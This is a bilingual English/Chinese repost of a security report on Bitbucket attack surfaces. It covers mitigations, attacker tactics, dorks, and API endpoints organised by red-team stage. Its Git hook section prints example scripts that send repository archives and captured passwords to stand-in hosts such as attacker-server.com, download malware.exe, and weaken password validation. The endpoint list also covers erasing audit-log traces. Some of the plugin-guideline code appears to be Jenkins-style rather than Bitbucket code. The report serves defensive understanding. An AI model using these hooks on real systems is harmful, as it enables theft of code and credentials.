Bitbucket Attack Vector

渗透技巧 10个月前 admin
46 0 0
Bitbucket Attack VectorBitbucket Attack Vector

Introduction 介绍

Bitbucket, a widely used Git repository management solution, provides a platform for developers to manage and collaborate on code. However, its extensive functionality and integration capabilities also present numerous attack vectors and surfaces that adversaries might exploit. This APT report outlines potential attack vectors and surfaces within Bitbucket, focusing on the data pipeline, active directory (LDAP), application link, and add-ons.
Bitbucket 是一种广泛使用的 Git 存储库管理解决方案,它为开发人员提供了一个管理和协作代码的平台。但是,其广泛的功能和集成能力也存在攻击者可能利用的大量攻击媒介和面。此 APT 报告概述了 Bitbucket 中的潜在攻击媒介和面,重点关注数据管道、Active Directory (LDAP)、应用程序链接和附加组件。

Attack Vector  攻击媒介

1. Data Pipeline: 1. 数据管道:

Attack Vector: 攻击途径:

Data Interception: Adversaries may target the data pipeline to intercept, manipulate, or exfiltrate sensitive data.
数据拦截:攻击者可能会以数据管道为目标来拦截、操纵或泄露敏感数据。

Injection Attacks: Injecting malicious code or altering data during transit.
注入攻击:在传输过程中注入恶意代码或更改数据。

Attack Surface: 攻击面:

API Endpoints: Unauthorized access to API endpoints can lead to data leaks or unauthorized actions.
API 端点:未经授权访问 API 端点可能会导致数据泄露或未经授权的操作。

Data Transmission: Unsecured data transmission between integrated systems.
数据传输:集成系统之间的不安全数据传输。

Mitigation: 缓解:

Implementing robust encryption for data in transit.
对传输中的数据实施强大的加密。

Ensuring API security through authentication and authorization mechanisms.
通过身份验证和授权机制确保 API 安全。

2. Active Directory – LDAP:
2. Active Directory – LDAP:

Attack Vector: 攻击途径:

Credential Harvesting: Targeting LDAP to harvest user credentials and gain unauthorized access.
凭据收集:以 LDAP 为目标,以收集用户凭据并获得未经授权的访问。

Privilege Escalation: Exploiting misconfigurations to escalate privileges.
权限提升:利用错误配置提升权限。

Attack Surface: 攻击面:

LDAP Integration: Direct interaction with LDAP might expose it to unauthorized access or exploitation.
LDAP集成:与LDAP的直接交互可能会使其面临未经授权的访问或利用。

User Data: Sensitive user data stored or managed through LDAP.
用户数据:通过 LDAP 存储或管理的敏感用户数据。

Mitigation: 缓解:

Employing stringent access controls and monitoring for LDAP.
对 LDAP 采用严格的访问控制和监控。

Regularly auditing and updating LDAP configurations.
定期审核和更新 LDAP 配置。

3. Application Link: 3. 应用链接:

Attack Vector: 攻击途径:

Link Exploitation: Exploiting application links to gain unauthorized access or disrupt services.
链接利用:利用应用程序链接获得未经授权的访问或中断服务。

Data Manipulation: Altering data being shared or transferred between linked applications.
数据操作:更改链接应用程序之间共享或传输的数据。

Attack Surface: 攻击面:

Inter-Application Communication: The communication channel between linked applications.
应用间通信:链接应用之间的通信通道。

Authentication Tokens: Tokens used for authenticating linked applications.
身份验证令牌:用于对链接的应用程序进行身份验证的令牌。

Mitigation: 缓解:

Ensuring secure and encrypted communication between linked applications.
确保链接的应用程序之间的安全和加密通信。

Implementing token security and regularly rotating authentication tokens.
实现令牌安全性并定期轮换身份验证令牌。

4. Add-Ons (JAR): 4. 附加组件 (JAR):

Attack Vector: 攻击途径:

Malicious Add-On: Introducing a malicious add-on to compromise Bitbucket.
恶意插件:引入恶意插件以破坏 Bitbucket。

Add-On Vulnerabilities: Exploiting vulnerabilities within legitimate add-ons.
附加组件漏洞:利用合法附加组件中的漏洞。

Attack Surface: 攻击面:

Add-On Marketplace: The platform through which add-ons are distributed and installed.
附加组件市场:分发和安装附加组件的平台。

Add-On Permissions: The permissions and access granted to installed add-ons.
加载项权限:授予已安装加载项的权限和访问权限。

Mitigation: 缓解:

Validating and verifying add-ons before installation.
在安装之前验证和验证附加组件。

Limiting add-on permissions to the least privilege necessary.
将附加组件权限限制为所需的最低权限。

Threat Actor Tactics, Techniques, and Procedures (TTPs):
威胁参与者策略、技术和程序 (TTP):

Initial Access: Utilizing stolen credentials or exploiting vulnerabilities for initial access.
初始访问:利用被盗凭据或利用漏洞进行初始访问。

Execution: Deploying malicious add-ons or scripts for execution within the environment.
执行:部署恶意加载项或脚本以在环境中执行。

Persistence: Exploiting application links or add-ons to maintain persistent access.
持久性:利用应用程序链接或附加组件来保持持久性访问。

Privilege Escalation: Exploiting misconfigurations or vulnerabilities within LDAP or add-ons.
权限提升:利用LDAP或附加组件中的错误配置或漏洞。

Defense Evasion: Manipulating logs or employing obfuscation techniques.
防御规避:操纵日志或采用混淆技术。

Credential Access: Targeting LDAP or API tokens for credential access.
凭据访问:以 LDAP 或 API 令牌为目标进行凭据访问。

Discovery: Identifying valuable data or further exploit vectors within the data pipeline.
发现:识别数据管道中的有价值的数据或进一步利用向量。

Lateral Movement: Utilizing application links or exploiting add-ons to move laterally.
横向移动:利用应用程序链接或利用附加组件进行横向移动。

Impact: Manipulating, deleting, or exfiltrating data to impact the organization.
影响:操纵、删除或泄露数据以影响组织。

Git Hook Vulnerabilities
Git Hook 漏洞

Git hooks, a fundamental feature in Bitbucket, offer developers the flexibility to streamline workflows through automation. However, these hooks also harbor the potential for abuse by threat actors, presenting security risks on both the server-side and client-side of Bitbucket.
Git 钩子是 Bitbucket 中的一项基本功能,它为开发人员提供了通过自动化简化工作流程的灵活性。但是,这些钩子也有可能被威胁行为者滥用,从而在 Bitbucket 的服务器端和客户端都存在安全风险。

Server-Side Git Hook Abuses:
服务器端 Git Hook 滥用:

1. Malicious Code Execution: Server-side Git hooks, such as pre-receive and post-receive hooks, can be abused by attackers to execute unauthorized code on the Bitbucket server. The following is a non-functional example of a malicious pre-receive hook:
1. 恶意代码执行:攻击者可以滥用服务器端 Git 钩子,例如预接收和接收后钩子,在 Bitbucket 服务器上执行未经授权的代码。以下是恶意预接收挂钩的非功能性示例:

#!/bin/bash

# A non-functional malicious pre-receive hook

while read oldrev newrev refname; do

  # Insert malicious code here

done

In reality, this script could run malicious code that compromises the server’s integrity or exfiltrates sensitive data.
实际上,此脚本可能会运行恶意代码,从而破坏服务器的完整性或泄露敏感数据。

2. Data Exfiltration: Malicious actors can manipulate server-side hooks to steal sensitive information from Bitbucket repositories. For instance, a modified post-receive hook might transmit confidential data to an external server:
2. 数据泄露:恶意行为者可以操纵服务器端钩子从 Bitbucket 存储库中窃取敏感信息。例如,修改后的接收后挂钩可能会将机密数据传输到外部服务器:

#!/bin/bash
# A non-functional example of a malicious post-receive hook for data exfiltration
while read oldrev newrev refname; do
git archive --format=zip --output=/tmp/data.zip $newrev

  curl -X POST -F "file=@/tmp/data.zip" https://attacker-server.com/upload

done

This example demonstrates how attackers could exfiltrate data from a repository.
此示例演示了攻击者如何从存储库中泄露数据。

3. Data Tampering: Threat actors might manipulate server-side hooks to tamper with data within a repository. They can modify post-receive hooks to alter code or data after it has been pushed. Although this example is non-functional, it demonstrates how data tampering might occur:
3. 数据篡改:威胁行为者可能会操纵服务器端钩子来篡改存储库中的数据。他们可以修改接收后钩子,以在推送代码或数据后更改代码或数据。尽管此示例不起作用,但它演示了数据篡改的可能发生方式:

#!/bin/bash

# A non-functional malicious post-receive hook for data tampering

while read oldrev newrev refname; do

  if [ "$refname" == "refs/heads/master" ]; then

    # Insert code to modify repository data here

  fi

done

In a real-world scenario, this script could introduce vulnerabilities or compromise the integrity of a repository.
在实际场景中,此脚本可能会引入漏洞或损害存储库的完整性。

Client-Side Git Hook Abuses:
客户端 Git Hook 滥用:

1. Credential Theft: Client-side Git hooks can be exploited to steal user credentials. Below is an example of a malicious pre-push hook:
1. 凭据盗窃:客户端 Git 钩子可用于窃取用户凭据。下面是一个恶意预推送钩子的示例:

#!/bin/bash

# A non-functional example of a malicious client-side pre-push hook for credential theft

read -p "Enter your username: " username

read -sp "Enter your password: " password

# Send the captured credentials to a remote server (non-functional)

curl -X POST -d "username=$username&password=$password" https://malicious-server.com/steal.php

While this script may not work, it illustrates how an attacker might attempt to steal user credentials.
虽然此脚本可能不起作用,但它说明了攻击者如何尝试窃取用户凭据。

2. Code Injection: Threat actors can manipulate client-side hooks to inject malicious code into a repository without a developer’s knowledge. Here’s a simplified example of a malicious post-checkout hook:
2. 代码注入:威胁参与者可以在开发人员不知情的情况下操纵客户端钩子将恶意代码注入存储库。下面是恶意结账后挂钩的简化示例:

#!/bin/bash

# A non-functional example of a malicious client-side post-checkout hook for code injection
# 用于代码注入的恶意客户端 post-checkout 钩子的非功能性示例

echo “Malicious code injection” >> compromised-file.js
echo “恶意代码注入”>>受损文件.js

This hypothetical script could insert unauthorized code into a developer’s workspace.
此假设脚本可能会将未经授权的代码插入到开发人员的工作区中。

3. Propagation of Malware: Client-side hooks can also be abused to propagate malware within a development team. A malicious pre-clone hook, though non-functional, showcases how an attacker might attempt to distribute malware:
3. 恶意软件的传播:客户端钩子也可能被滥用在开发团队中传播恶意软件。恶意克隆前挂钩虽然不起作用,但展示了攻击者可能如何尝试分发恶意软件:

#!/bin/bash

# A non-functional example of a malicious client-side pre-clone hook for malware propagation

echo "Downloading a useful tool..."

curl -o ~/Downloads/useful-tool.exe https://malicious-server.com/malware.exe

This script, if operational, could attempt to download and execute malware on a developer’s machine during a repository clone operation.
如果此脚本可操作,则可能会在存储库克隆操作期间尝试在开发人员的计算机上下载和执行恶意软件。

4. Code Tampering: Attackers can manipulate client-side Git hooks to tamper with code and introduce vulnerabilities. For example, a malicious pre-commit hook could modify code in a way that introduces a security flaw, as demonstrated below:
4. 代码篡改:攻击者可以操纵客户端 Git 钩子篡改代码并引入漏洞。例如,恶意提交前钩子可能会以引入安全漏洞的方式修改代码,如下所示:

#!/bin/bash

# A non-functional example of a malicious client-side pre-commit hook for code tampering

sed -i 's/validate_password($password)/validate_password($password, false)/' login.php

In a real-world scenario, this modification could compromise the security of an application.
在实际方案中,此修改可能会危及应用程序的安全性。

In summary, Git hooks in Bitbucket provide valuable automation capabilities but can also be potential vectors for abuse if not managed and secured properly.
总之,Bitbucket 中的 Git 钩子提供了宝贵的自动化功能,但如果管理不当,也可能成为滥用的潜在媒介。

Tools 工具

Identifying Bitbucket Instances with Cyber Threat Intelligence Service
使用 Cyber Threat Intelligence Service 识别 Bitbucket 实例

Google Dorks: 谷歌多克斯:

Find Bitbucket Instances:
查找 Bitbucket 实例:

Dork: intitle:”Bitbucket” login
Dork: intitle:“Bitbucket” 登录

Find Public Repositories:
查找公共存储库:

Dork: intitle:”Bitbucket” “Overview” inurl:projects
Dork: intitle:“Bitbucket” “概述” inurl:projects

Exposed .git Directories:
公开的 .git 目录:

Dork: intitle:”index of” inurl:.git
Dork: intitle:“索引” inurl:.git

Paths: 路径:

User Enumeration: 用户枚举:

Path: /rest/api/1.0/users
路径:/rest/api/1.0/users

Repository Discovery: 存储库发现:

Path: /rest/api/1.0/projects/{projectKey}/repos
小路:/rest/api/1.0/projects/{projectKey}/repos

SSH Keys: SSH 密钥:

Path: /rest/ssh/1.0/keys
路径:/rest/ssh/1.0/keys

Webhooks: Webhooks:

Path: /rest/webhooks/1.0/webhook
路径:/rest/webhooks/1.0/webhook

Ports: 港口:

Default HTTP: 默认 HTTP:

Port: 7990

Default HTTPS: 默认 HTTPS:

Port: 7999 端口:7999

SSH: SSH:

Port: 7992 端口:7992

Meta Tags: 元标签:

Application Name: 应用程序名称:

Meta Tag: <meta name=”application-name” content=”Bitbucket”>
元标记:

Bitbucket Attack Vector

Important API Endpoints Across Red Teaming Stages
跨红队阶段的重要 API 端点

1. Reconnaissance Stage: 1.侦察阶段:

User Enumeration: 用户枚举:

Endpoint: /rest/api/1.0/users
端点:/rest/api/1.0/users

Red Team Use: Identifying users for targeted phishing or brute-force attacks.
红队使用:识别用户进行有针对性的网络钓鱼或暴力攻击。

Repository Discovery: 存储库发现:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos
端点:/rest/api/1.0/projects/{projectKey}/repos

Red Team Use: Identifying repositories to target for codebase analysis or data exfiltration.
红队使用:确定要针对代码库分析或数据外泄的存储库。

2. Initial Access Stage: 2. 初始访问阶段:

Authentication: 认证:

Endpoint: /rest/auth/1/session
端点:/rest/auth/1/session

Red Team Use: Attempting unauthorized access via credential stuffing or brute force.
红队使用:尝试通过撞库或暴力破解进行未经授权的访问。

API Token Access: API 令牌访问:

Endpoint: /rest/access-tokens/1.0/tokens/current
端点:/rest/access-tokens/1.0/tokens/current

Red Team Use: Attempting to steal or misuse API tokens.
红队使用:试图窃取或滥用 API 令牌。

3. Establishing Foothold Stage:
3. 建立立足点阶段:

Create Pull Request: 创建拉取请求:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}/pull-requests
端点:/rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}/pull-requests

Red Team Use: Introducing malicious code through pull requests.
红队使用:通过拉取请求引入恶意代码。

Clone Repository: 克隆存储库:

Endpoint: /scm/{projectKey}/{repositorySlug}.git
端点:/scm/{projectKey}/{repositorySlug}.git

Red Team Use: Downloading codebases to identify vulnerabilities or sensitive data.
红队使用:下载代码库以识别漏洞或敏感数据。

4. Privilege Escalation Stage:
4. 权限提升阶段:

User Permissions: 用户权限:

Endpoint: /rest/api/1.0/admin/permissions/users?filter={username}
端点:/rest/api/1.0/admin/permissions/users?filter={username}

Red Team Use: Identifying users with high privileges to target.
红队使用:识别具有高权限的用户作为目标。

Group Permissions: 组权限:

Endpoint: /rest/api/1.0/admin/permissions/groups
端点:/rest/api/1.0/admin/permissions/groups

Red Team Use: Identifying groups with high privileges for infiltration.
红队使用:识别具有高渗透权限的组。

5. Lateral Movement Stage:
5.横向移动阶段:

SSH Keys: SSH 密钥:

Endpoint: /rest/ssh/1.0/keys
端点:/rest/ssh/1.0/keys

Red Team Use: Stealing SSH keys to access other systems.
红队使用:窃取 SSH 密钥以访问其他系统。

Application Links: 应用链接:

Endpoint: /rest/applinks/1.0/applicationlink
端点:/rest/applinks/1.0/applicationlink

Red Team Use: Moving laterally to linked applications.
红队使用:横向移动到链接的应用程序。

6. Impact Stage: 6. 影响阶段:

Delete Repository: 删除存储库:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}
端点:/rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}

Red Team Use: Deleting or altering repositories to disrupt operations.
红队使用:删除或更改存储库以中断操作。

Modify User: 修改用户:

Endpoint: /rest/api/1.0/users/{userSlug}
端点:/rest/api/1.0/users/{userSlug}

Red Team Use: Modifying user details for further attacks or obfuscation.
红队使用:修改用户详细信息以进行进一步攻击或混淆。

Additional Endpoints: 其他端点:

7. Data Exfiltration Stage:
7. 数据泄露阶段:

Fetch Commits: 获取提交:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}/commits
端点:/rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}/commits

Red Team Use: Identifying and exfiltrating sensitive data or changes.
红队使用:识别和泄露敏感数据或更改。

8. Persistence Stage: 8. 持久性阶段:

Webhooks: Webhooks:

Endpoint: /rest/webhooks/1.0/webhook
端点:/rest/webhooks/1.0/webhook

Red Team Use: Creating malicious webhooks for continuous data access.
红队使用:创建恶意 webhook 以进行连续数据访问。

9. Obfuscation Stage: 9. 混淆阶段:

Audit Logs: 审核日志:

Endpoint: /rest/audit/1.0/audits
端点:/rest/audit/1.0/audits

Red Team Use: Identifying and erasing traces of malicious activities.
红队使用:识别和清除恶意活动的痕迹。

10. Cleanup Stage: 10. 清理阶段:

Remove SSH Key: 删除 SSH 密钥:

Endpoint: /rest/ssh/1.0/keys/{keyId}
端点:/rest/ssh/1.0/keys/{keyId}

Red Team Use: Removing SSH keys to erase traces and maintain access.
红队使用:删除 SSH 密钥以擦除痕迹并保持访问。

Bitbucket Plugin Security and Development Guidelines
Bitbucket 插件安全和开发指南

Bitbucket, a widely-used Git repository management solution, allows developers to extend its functionality through plugins. However, the development and use of plugins must be approached with a security-first mindset to prevent vulnerabilities and ensure the stability of the Bitbucket environment.
Bitbucket 是一种广泛使用的 Git 存储库管理解决方案,允许开发人员通过插件扩展其功能。但是,插件的开发和使用必须以安全第一的心态进行,以防止漏洞并确保 Bitbucket 环境的稳定性。

Bitbucket Plugin Security:
Bitbucket 插件安全性:

Dependency Scanning: 依赖项扫描:

Ensure all dependencies of your plugin are free from known vulnerabilities.
确保插件的所有依赖项都没有已知漏洞。

Use tools like OWASP Dependency-Check to identify and fix issues.
使用 OWASP Dependency-Check 等工具来识别和修复问题。

Code Review: 代码审查:

Conduct regular code reviews to identify potential security issues.
定期进行代码审查,以识别潜在的安全问题。

Ensure that no secrets or sensitive data are hardcoded in the plugin code.
确保插件代码中没有机密或敏感数据被硬编码。

Access Control: 存取控制:

Implement strict access controls and ensure that only authorized users can configure or use the plugin.
实施严格的访问控制,并确保只有授权用户才能配置或使用插件。

Use Bitbucket’s built-in functions to enforce permissions.
使用 Bitbucket 的内置函数来强制执行权限。

public void doSomeAction(HttpServletRequest req, HttpServletResponse rsp) {

    PermissionCheck.checkAdmin();

    // Action code here

}

Input Validation:

Validate and sanitize all inputs to prevent injection attacks.

Use allow-lists and regular expressions to validate data.

public FormValidation doCheckName(@QueryParameter String value) {

    if (value.matches("^[a-zA-Z0-9_]+$")) {

        return FormValidation.ok();

    } else {

        return FormValidation.error("Invalid name");

    }

}

Output Encoding: 输出编码:

Ensure all outputs are properly encoded to prevent XSS attacks.
确保所有输出都正确编码,以防止 XSS 攻击。

Use functions like HtmlUtils.htmlEscape to encode data.
使用 HtmlUtils.htmlEscape 等函数对数据进行编码。

String safeOutput = HtmlUtils.htmlEscape(inputString);

Bitbucket Plugin Development Guidelines:
Bitbucket 插件开发指南:

Follow the MVC Architecture:
遵循 MVC 架构:

Separate the Model, View, and Controller to ensure clean and maintainable code.
将模型、视图和控制器分开,以确保代码干净且可维护。

Use Bitbucket API: 使用 Bitbucket API:

Leverage Bitbucket API for accessing built-in functionalities and objects.
利用 Bitbucket API 访问内置功能和对象。

Implement Descriptors: 实现描述符:

Descriptors help in defining global configurations and settings.
描述符有助于定义全局配置和设置。

@Extension

public static final class DescriptorImpl extends Descriptor<Builder> {

    public boolean isApplicable(Class<? extends AbstractProject> aClass) {

        return true;

    }

    public String getDisplayName() {

        return "My Plugin Name";

    }

}

Define Configurations:

Use config.jelly to define the configuration options in the UI.

<j:jelly xmlns:j="jelly:core" xmlns:f="/lib/form">

    <f:entry title="Parameter" field="parameter">

        <f:textbox />

    </f:entry>

</j:jelly>

Handle Build Steps:

Implement classes to define actions to be taken during a build step.

public class MyBuilder extends Builder {

    private final String parameter;

    @DataBoundConstructor

    public MyBuilder(String parameter) {

        this.parameter = parameter;

    }

    @Override

    public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) {

        // Build step actions here

        return true;

    }

}

Manage Plugin Dependencies:
管理插件依赖关系:

Ensure your pom.xml correctly defines all dependencies and Bitbucket version.
确保您的 pom.xml 正确定义了所有依赖项和 Bitbucket 版本。

<dependencies>

    <dependency>

        <groupId>com.atlassian.bitbucket.server</groupId>

        <artifactId>bitbucket-api</artifactId>
位桶 API

        <version>7.0.0</version>

        <scope>provided</scope>
提供

    </dependency>

</dependencies>

Conclusion: 结论:

Bitbucket, while providing a robust platform for code management and collaboration, also presents various attack vectors and surfaces that need to be secured and monitored. Organizations must employ a defense-in-depth strategy, ensuring that each attack surface is secured, and potential vectors are mitigated. Regular audits, monitoring, and employing security best practices are pivotal in safeguarding the environment against sophisticated APTs.
Bitbucket 在为代码管理和协作提供强大平台的同时,还提出了需要保护和监控的各种攻击媒介和面。组织必须采用纵深防御策略,确保每个攻击面都得到保护,并缓解潜在的媒介。定期审计、监控和采用安全最佳实践对于保护环境免受复杂 APT 的侵害至关重要。

原文始发于hadess:Bitbucket Attack Vector

版权声明:admin 发表于 2024年1月18日 上午9:26。
转载请注明:Bitbucket Attack Vector | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...